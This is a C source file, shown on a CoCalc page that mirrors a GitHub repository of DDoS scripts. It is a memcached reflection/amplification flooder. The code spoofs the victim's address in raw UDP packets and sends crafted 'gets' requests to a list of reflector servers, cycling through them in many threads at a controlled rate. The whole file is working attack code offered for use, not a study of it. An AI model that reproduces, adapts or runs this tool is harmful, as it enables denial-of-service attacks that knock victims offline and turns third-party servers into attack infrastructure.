Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/Port 11211 - MemcacheD (bonus seeding scripts)/memcached-dynamic.c
4622 views
1
/*-------------------------------

2
Memcache 2019 - Whipping a dead horse.

3
Cancerous C script by Phenomite.

4


5
Generates memcacheD payload dynamically based on a list of space delimited keys.

6
A filter script will build the following:

7


8
Format: <ip>\t<keys>

9


10
Ranges from 1 key to `n` maximum defined in the filter script I made.

11
Each key will potentially be over 1mb of data, depending on the argument passed

12
to filter script.

13


14
Keys will be delimited by space, meaning the other non-memcached space is a tab

15
(or \t). This tab will be used to space ip's from keys.

16


17
-------------------------------*/

18
#include <arpa/inet.h>

19
#include <netinet/ip.h>

20
#include <netinet/udp.h>

21
#include <pthread.h>

22
#include <stdio.h>

23
#include <stdlib.h>

24
#include <string.h>

25
#include <sys/socket.h>

26
#include <time.h>

27
#include <unistd.h>

28


29
#define MAX_PACKET_SIZE 4096

30
#define PHI 0x9e3779b9

31
static uint32_t Q[4096], c = 362436;

32
static unsigned int DPORT = 11211;

33


34
struct list {

35
  struct sockaddr_in data;

36
  char items[512];

37
  struct list *next;

38
  struct list *prev;

39
};

40
struct list *head;

41
volatile int tehport;

42
volatile int limiter;

43
volatile unsigned int pps;

44
volatile unsigned int sleeptime = 100;

45
struct thread_data {

46
  int thread_id;

47
  struct list *list_node;

48
  struct sockaddr_in sin;

49
};

50


51
void init_rand(uint32_t x) {

52
  int i;

53
  Q[0] = x;

54
  Q[1] = x + PHI;

55
  Q[2] = x + PHI + PHI;

56
  for (i = 3; i < 4096; i++) {

57
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

58
  }

59
}

60


61
uint32_t rand_cmwc(void) {

62
  uint64_t t, a = 18782LL;

63
  static uint32_t i = 4095;

64
  uint32_t x, r = 0xfffffffe;

65
  i = (i + 1) & 4095;

66
  t = a * Q[i] + c;

67
  c = (t >> 32);

68
  x = t + c;

69
  if (x < c) {

70
    x++;

71
    c++;

72
  }

73
  return (Q[i] = r - x);

74
}

75


76
/* function for header checksums */

77
unsigned short csum(unsigned short *buf, int nwords) {

78
  unsigned long sum;

79
  for (sum = 0; nwords > 0; nwords--)

80
    sum += *buf++;

81
  sum = (sum >> 16) + (sum & 0xffff);

82
  sum += (sum >> 16);

83
  return (unsigned short)(~sum);

84
}

85


86
void setup_ip_header(struct iphdr *iph) {

87
  iph->ihl = 5;

88
  iph->version = 4;

89
  iph->tos = 0;

90
  iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;

91
  iph->id = htonl(rand() % 65400 + 1);

92
  iph->frag_off = 0;

93
  iph->ttl = MAXTTL; // 64

94
  iph->protocol = IPPROTO_UDP;

95
  iph->check = 0;

96
  iph->saddr = inet_addr("127.0.0.1");

97
}

98
void setup_udp_header(struct udphdr *udph) {

99
  udph->source = htons(rand() % 20000 + 40000);

100
  udph->dest = htons(DPORT);

101
  udph->check = 0;

102
  memcpy((void *)udph + sizeof(struct udphdr), "\x01", 1);

103
  udph->len = htons(sizeof(struct udphdr) + 1);

104
}

105
void *flood(void *par1) {

106
  struct thread_data *td = (struct thread_data *)par1;

107
  char datagram[MAX_PACKET_SIZE];

108
  struct iphdr *iph = (struct iphdr *)datagram;

109
  struct udphdr *udph = (/*u_int8_t*/ void *)iph + sizeof(struct iphdr);

110
  struct sockaddr_in sin = td->sin;

111
  struct list *list_node = td->list_node;

112
  int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

113
  if (s < 0) {

114
    fprintf(stderr, "Could not open raw socket.\n");

115
    exit(-1);

116
  }

117
  init_rand(time(NULL));

118
  memset(datagram, 0, MAX_PACKET_SIZE);

119
  setup_ip_header(iph);

120
  setup_udp_header(udph);

121
  udph->source = htons(rand() % 20000 + 40000);

122
  iph->saddr = sin.sin_addr.s_addr;

123
  iph->daddr = list_node->data.sin_addr.s_addr;

124
  iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

125
  int tmp = 1;

126
  const int *val = &tmp;

127
  if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof(tmp)) < 0) {

128
    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

129
    exit(-1);

130
  }

131
  init_rand(time(NULL));

132
  register unsigned int i;

133
  i = 0;

134
  while (1) {

135
    memset(datagram, 0, MAX_PACKET_SIZE);

136


137
    // Read in new keys for respective IP

138
    unsigned char PAYLOAD[700];

139
    list_node = list_node->next;

140
    strcpy(PAYLOAD, list_node->items);

141


142
    // Edit payload and set

143
    unsigned int payloadlen = strlen(PAYLOAD);

144
    unsigned char newPAYLOAD[740] = "\x00\x01\x00\x00\x00\x01\x00\x00gets\x20";

145
    memcpy(newPAYLOAD + 13, PAYLOAD, payloadlen);

146
    memcpy(newPAYLOAD + 13 + payloadlen, "\n", 1);

147
    unsigned int PAYLOADSIZE = payloadlen + 14;

148


149
    iph->ihl = 5;

150
    iph->version = 4;

151
    iph->tos = 0;

152
    iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + PAYLOADSIZE;

153
    // iph->id = htonl(rand() % 65337 + 1);

154
    iph->frag_off = 0;

155
    iph->ttl = MAXTTL; // 64

156
    iph->protocol = IPPROTO_UDP;

157
    iph->check = 0;

158
    iph->saddr = sin.sin_addr.s_addr;

159
    iph->daddr = list_node->data.sin_addr.s_addr;

160
    // iph->saddr = sin.sin_addr.s_addr;

161
    iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

162


163
    iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

164


165
    udph->source = htons(rand() % 65337 + 80);

166
    udph->dest = htons(DPORT);

167
    udph->check = 0;

168
    memcpy((void *)udph + sizeof(struct udphdr), newPAYLOAD, PAYLOADSIZE);

169
    udph->len = htons(sizeof(struct udphdr) + PAYLOADSIZE);

170


171
    sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *)&list_node->data,

172
           sizeof(list_node->data));

173
    pps++;

174
    if (i >= limiter) {

175
      i = 0;

176
      usleep(sleeptime);

177
    }

178
    i++;

179
  }

180
}

181
void processMemPayload(char *lineStr, int lineIter) {

182
  int x;

183
  int bufferingSection = 0;

184
  char ipBuffer[32] = ""; // Store ip

185
  char payloadBuffer[700] =

186
      ""; // Will cause a segfault if filtered list exceeds this

187
  for (x = 0; x < strlen(lineStr); x++) {

188
    // Basically stop assigning chars to ip buffer when you hit a tab (meaning

189
    // you now are loading the payload) Reasoning for this is:

190
    // 1. I want multiple keys in the "payload" with spaces to separate

191
    // 2. The other memecache control character other than space is thus tab.

192
    if ((lineStr[x] == '\t') || (lineStr[x] == '\n') || (lineStr[x] == '\r')) {

193
      // buffer[strlen(buffer) - 1] = 0x00;

194
      bufferingSection++;

195
      continue;

196
    }

197
    if (bufferingSection == 1) {

198
      payloadBuffer[strlen(payloadBuffer)] = (char)lineStr[x];

199
    } else if (bufferingSection == 0) {

200
      ipBuffer[strlen(ipBuffer)] = (char)lineStr[x];

201
    }

202
  }

203


204
  if (head == NULL) {

205
    head = (struct list *)malloc(sizeof(struct list));

206
    bzero(&head->data, sizeof(head->data));

207
    head->data.sin_addr.s_addr = inet_addr(ipBuffer);

208
    strcpy(head->items, payloadBuffer);

209
    head->next = head;

210
    head->prev = head;

211
  } else {

212
    struct list *new_node = (struct list *)malloc(sizeof(struct list));

213
    memset(new_node, 0x00, sizeof(struct list));

214
    new_node->data.sin_addr.s_addr = inet_addr(ipBuffer);

215
    strcpy(new_node->items, payloadBuffer);

216
    new_node->prev = head;

217
    new_node->next = head->next;

218
    head->next = new_node;

219
  }

220
}

221
int main(int argc, char *argv[]) {

222
  if (argc < 6) {

223
    fprintf(stdout, "Phenom Meme Poc: %s host port ref-file thread pps time\n",

224
            argv[0]);

225
    exit(-1);

226
  }

227
  srand(time(NULL));

228
  int i = 0;

229
  head = NULL;

230
  fprintf(stdout, "Loading up those juicy reflectrs\n");

231
  int max_len = 700;

232
  char *buffer = (char *)malloc(max_len);

233
  buffer = memset(buffer, 0x00, max_len);

234
  int num_threads = atoi(argv[4]);

235
  int maxpps = atoi(argv[5]);

236
  limiter = 0;

237
  pps = 0;

238
  int multiplier = 20;

239
  FILE *list_fd = fopen(argv[3], "r");

240
  while (fgets(buffer, max_len, list_fd) != NULL) {

241
    processMemPayload(buffer, i);

242
    i++;

243
  }

244
  struct list *current = head->next;

245
  pthread_t thread[num_threads];

246
  struct sockaddr_in sin;

247
  sin.sin_family = AF_INET;

248
  sin.sin_addr.s_addr = inet_addr(argv[1]);

249
  struct thread_data td[num_threads];

250
  for (i = 0; i < num_threads; i++) {

251
    td[i].thread_id = i;

252
    td[i].sin = sin;

253
    td[i].list_node = current;

254
    pthread_create(&thread[i], NULL, &flood, (void *)&td[i]);

255
  }

256
  fprintf(stdout, "Doing the deed\n");

257
  for (i = 0; i < (atoi(argv[6]) * multiplier); i++) {

258
    usleep((1000 / multiplier) * 1000);

259
    if ((pps * multiplier) > maxpps) {

260
      if (1 > limiter) {

261
        sleeptime += 100;

262
      } else {

263
        limiter--;

264
      }

265
    } else {

266
      limiter++;

267
      if (sleeptime > 25) {

268
        sleeptime -= 25;

269
      } else {

270
        sleeptime = 0;

271
      }

272
    }

273
    pps = 0;

274
  }

275
  return 0;

276
}

277